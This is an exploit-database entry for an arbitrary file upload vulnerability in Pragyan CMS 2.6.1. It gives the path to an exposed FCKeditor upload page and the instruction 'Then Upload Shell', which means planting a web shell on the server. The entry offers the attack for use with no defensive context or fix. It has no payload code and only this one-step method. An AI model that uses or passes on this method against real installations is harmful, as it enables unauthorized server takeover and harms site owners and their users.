id: 17373
date: 01/13/2012
title: Pragyan CMS 2.6.1 Arbitrary File Upload Vulnerability
author: xSecurity
cves: 

==========================================
# Exploit Title: pragyan 2.6.1 Upload File
# Author: Dr.KroOoZ
# Software : http://ignum.dl.sourceforge.net/project/pragyan/pragyan/2.6.1/pragyan-2.6.1.tar.gz
# Tested on: || Linux || Windows ||
# Dork :
==========================================
 ===[ Exploit ]===
 
http://localhost/Path/cms/modules/article/fckEditor/editor/filemanager/browser/default/frmupload.html
 
Then Upload Shell xD



#  0day.today [2023-03-22]  #